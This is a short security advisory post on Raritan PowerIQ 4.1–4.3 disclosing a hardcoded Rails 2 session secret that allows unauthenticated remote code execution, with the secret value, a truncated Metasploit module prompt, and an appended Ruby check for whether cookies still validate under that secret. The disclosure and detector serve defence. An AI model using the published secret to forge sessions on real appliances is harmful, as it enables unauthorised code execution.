Posted by Brandon Perry on Mar 12
Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web
interface with a hardcoded session secret of
8e238c9702412d475a4c44b7726a0537.
This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.
msf exploit(rails_secret_deserialization) > show options
Module options (exploit/multi/http/rails_secret_deserialization):
Name Current Setting…
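
An added example, not part of the original post or of the Metasploit module: a check an administrator can run against a session cookie issued by their own appliance to see whether it still validates under the published secret. It assumes the standard Rails 2 cookie-store layout (Base64 data, "--", hex HMAC-SHA1); the helper names are hypothetical and the sample cookies are constructed placeholders.

```ruby
require 'openssl'
require 'base64'
require 'cgi'

# Secret published in the advisory above.
KNOWN_SECRET = '8e238c9702412d475a4c44b7726a0537'

def hmac_hex(secret, data)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
end

# Constant-time comparison so the check itself leaks nothing through timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# True if the cookie's signature validates under the hardcoded secret.
# Assumed layout: "<base64 data>--<40 hex chars of HMAC-SHA1(secret, data)>".
# Both the raw and the URL-unescaped value are tried, because a cookie copied
# from a browser or proxy log may or may not still be percent-encoded.
def signed_with_known_secret?(raw_cookie, secret = KNOWN_SECRET)
  [raw_cookie.to_s, CGI.unescape(raw_cookie.to_s)].uniq.any? do |value|
    data, sep, digest = value.rpartition('--')
    next false if sep.empty? || data.empty? || digest !~ /\A[0-9a-f]{40}\z/
    secure_equal?(hmac_hex(secret, data), digest)
  end
end

# Constructed sample: opaque placeholder bytes, not a real session object.
def sample_cookie(secret)
  data = Base64.strict_encode64('constructed-sample-session')
  CGI.escape("#{data}--#{hmac_hex(secret, data)}")
end

if __FILE__ == $PROGRAM_NAME
  { 'shipped secret' => sample_cookie(KNOWN_SECRET),
    'rotated secret' => sample_cookie('constructed-rotated-secret') }.each do |label, cookie|
    hit = signed_with_known_secret?(cookie)
    puts "#{label}: #{hit ? 'hardcoded secret in use, rotate it' : 'ok'}"
  end
end
```

A match means the appliance is still signing sessions with the shipped value and the secret needs to be replaced with a per-install random one.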